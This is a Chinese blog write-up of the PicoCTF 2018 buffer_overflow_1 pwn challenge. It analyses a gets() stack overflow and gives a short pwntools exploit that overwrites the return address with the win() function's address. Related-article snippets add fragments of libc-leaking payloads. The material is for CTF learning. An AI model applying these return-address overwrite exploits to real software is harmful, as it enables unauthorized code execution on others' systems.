PicoCTF_2018_buffer_overflow_1

最新推荐文章于 2024-09-01 20:56:28 发布

m0sway

最新推荐文章于 2024-09-01 20:56:28 发布

阅读量440

点赞数

分类专栏： BUU-PWN 文章标签： pwn 网络安全安全

本文链接：https://blog.csdn.net/m0sway/article/details/121588147

版权

BUU-PWN 专栏收录该内容

58 篇文章 0 订阅

订阅专栏

PicoCTF_2018_buffer_overflow_1

使用checksec查看：
在这里插入图片描述
保护机制全关，看起来没啥难度。

扔进IDA中查看：
在这里插入图片描述
主函数中给出了漏洞函数，跟进查看：

gets()函数，栈溢出，s距离ebp0x28

查看下这题的字符串可以发现函数win()：
在这里插入图片描述
能够直接获取到flag，直接秒了这题。

exp：

from pwn import *

#start 
# r = process("../buu/PicoCTF_2018_buffer_overflow_1")
r = remote("node4.buuoj.cn",26126)

#params
win_addr = 0x80485CB

#attack
payload= b'M'*(0x28+4) + p32(win_addr)
r.recv()
r.sendline(payload)


r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

m0sway

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

innodb_buffer_pool_reads、innodb_buffer_pool_read_requests分析与innodb 缓存命中率计算

w1346561235的博客

11-10

3700

澄清一下innodb buffer pool 缓存命中率（cachehit ratio）指标的计算，这个计算涉及到两个状态变量innodb_buffer_pool_reads和innodb_buffer_pool_read_requests。官方文档对这两个变量的解释如下： Innodb_buffer_pool_reads The number of logical reads thatInnoDBcould not satisfy from thebuffer pool, and had...

Lab1-Buffer OverFlow

11-10

Lab1-Buffer OverFlow,包含代码、实验说明和论文。

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF：PicoCTF_2018_buffer_overflow_1

weixin_51055545的博客

01-05

1372

先放进虚拟机中检查：任何保护机制都没开，放到32位IDA中：主函数很简单，进入vuln()函数看一下: 很明显有溢出，进入栈中看偏移：这里偏移为0x28，我们思路是第一次溢出，去泄露libc地址，再次进行溢出get shell。第一次溢出： io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.

picoctf-2018-buffer-overflow-1

热门推荐

SunZLong的博客

01-10

1万+

首先了解三个参数三个参数： innodb_buffer_pool_size（缓冲池大小） innodb_buffer_pool_chunk_size（定义InnoDB缓冲池大小调整操作的块大小） innodb_buffer_pool_instances（InnoDB缓冲池划分为的区域数）关于两个参数的关系，在MySQL8.0的官方文档中： Buffer pool size must ...

IDA逆向分析缓冲区溢出攻击漏洞实例.rar

03-12

很好的逆向分析的学习资料！！！ https://blog.csdn.net/wlwdecs_dn/article/details/114708775

picoctf_2018_buffer overflow 1

个人笔记

04-26

104

【代码】picoctf_2018_buffer overflow 1。

BUUCTF pwn——PicoCTF_2018_buffer_overflow 1

CNS-Enterprise BCC-1701-J

05-13

102

BUUCTF 做题练习

picoctf_2018_buffer overflow 0

z1r0的博客

02-14

419

picoctf_2018_buffer overflow 0 查看保护这里会将flag输入到flag这个全局变量里，还有一个signal信号11。表示对存储的无效访问这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区，把输出缓冲区里的东西打印到标准输出设备上，也就是会打印flag。其实就是当程序造成无效内存访问的时候，就会输出flag。接着再输入参数，放到vuln函数里这里有一个栈溢出，因为输入的参数可以无限长，所以在执行栈溢出时，程序会造成无效内

[BUUCTF]PWN——picoctf_2018_buffer overflow 1

BangSen1的博客

03-20

305

picoctf_2018_buffer overflow 1 例行检查，32位，没开启保护运行一下用IDA打开，检索字符串，看到了flag.txt，跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入，存在溢出漏洞，覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)

picoctf Pwn buffer overflow 1

MrTreebook的博客

04-04

230

picoctf Pwn buffer overflow 11.IDA反编译看一下2.checksec检查3.检查后门函数4.看一下vuln函数5.利用思路6.exp 1.IDA反编译看一下 2.checksec检查 3.检查后门函数 4.看一下vuln函数 5.利用思路在vuln函数中有一个gets()函数可以溢出将放回地址覆盖成win()函数的地址即可没有canary和pie的保护利用起来非常简单 6.exp from pwn import * p = remote("saturn.pi

BUUCTF：PicoCTF_2018_buffer_overflow_2

weixin_51055545的博客

01-05

932

例行检查程序：还是32位程序，没有canary，很可能是溢出类的。放到IDA中：主函数没什么特别，进入vuln()函数看一下：果然存在溢出漏洞，两次溢出，直接去get shell 第一次溢出去泄露libc地址，第二次溢出get shell 这里我选怎printf()函数作为泄露的函数，同样也可以选择puts()函数，构造payload ： io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(

dp_debug_check_buffer_overflow

05-25

dp_debug_check_buffer_overflow 是一个调试函数，用于检测缓冲区溢出的情况。当程序运行时，如果发现有缓冲区溢出的情况，就会触发 dp_debug_check_buffer_overflow 函数，并打印出相应的调试信息，以便程序员进行...